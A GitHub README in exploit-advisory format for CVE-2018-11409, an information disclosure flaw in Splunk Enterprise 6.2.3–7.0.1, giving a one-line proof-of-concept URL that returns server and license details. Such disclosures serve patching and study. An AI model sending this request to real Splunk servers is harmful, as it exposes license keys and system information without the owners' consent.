Skip to content
splunk enterprise information disclosure
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md

README.md

splunk

Exploit Title: [information disclosure]

Google Dork: [n/r]

Date: [23/05/2018]

Exploit Author: [KoF2002]

Vendor Homepage: [https://www.splunk.com/]

Software Link: []

Version: [6.2.3 - 7.01 MAYBE ALL VERSION AFFECTED]

Tested on: [linux os]

CVE : [CVE-2018-11409]

[Attack Type] [Remote]


Splunk through 6.2.3 7.0.1 allows information disclosure by appending

/__raw/services/server/info/server-info?output_mode=json to a query,

as demonstrated by discovering a license key and other information.

PoC :

https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json


Greats TO : Cold z3ro , ihab pal and all HTLovers "We Are Back"

https://www.0x30.cc/core/

You can’t perform that action at this time.